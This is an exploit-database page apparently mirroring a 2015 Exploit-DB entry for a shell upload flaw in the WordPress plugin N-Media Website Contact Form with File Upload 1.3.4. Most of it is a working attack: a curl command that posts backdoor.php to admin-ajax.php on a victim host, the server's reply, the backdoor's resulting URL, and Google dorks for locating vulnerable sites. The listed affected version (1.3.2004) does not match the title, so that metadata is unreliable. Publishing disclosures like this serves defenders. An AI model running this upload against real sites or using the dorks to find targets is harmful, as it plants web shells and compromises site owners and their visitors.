header-logo
Suggest Exploit
vendor:
WordPress
by:
Claudio Viviani
7.5
CVSS
HIGH
Unrestricted File Upload
434
CWE
Product Name: WordPress
Affected Version From: 1.3.2004
Affected Version To: 1.3.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux BackBox 4.0 / curl 7.35.0
2015

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

The 'upload_file()' ajax function is affected from unrestircted file upload vulnerability. An attacker can upload a malicious file to the server by sending a POST request with the malicious file to the 'admin-ajax.php' page.

Mitigation:

Restrict file uploads to only trusted file types and validate the file content using server-side checks.
Source

Exploit-DB raw data:

######################

# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

# Exploit Author : Claudio Viviani


# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip

# Date : 2015-04-1

# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/

# Tested on : Linux BackBox 4.0 / curl 7.35.0

#####################

# Info :  

 The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.


######################

# PoC:

 curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
 
 
 Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}


######################

# Backdoor Location:

 http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
 

#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
	        http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Navigation

Suggest Exploit

Services By CQR